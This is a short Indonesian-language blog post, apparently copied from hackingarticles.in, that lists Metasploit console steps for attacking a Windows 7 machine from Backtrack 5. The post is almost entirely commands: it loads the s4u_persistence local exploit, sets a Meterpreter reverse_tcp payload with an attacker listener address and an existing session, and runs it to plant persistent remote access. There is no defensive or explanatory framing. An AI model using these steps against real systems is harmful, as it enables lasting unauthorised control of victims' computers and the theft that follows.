Exploit Targets
Windows PC
Requirement
Attacker : Backtrack 5
Victim PC : Windows 7
Buka terminal di backtrack tipe : msfconsole
Sekarang tipe : use exploit/windows/local/s4u_persistence
msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (s4u_persistence)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (s4u_persistence)>set session 1
msf exploit (s4u_persistence)>exploit
Semoga bermanfaat.
^_^
sumber : hackingarticles.in
0 komentar:
Posting Komentar
Terima kasih atas kunjungannya.
^_^
Pengunjung yang baik hati selalu meninggalkan komentarnya.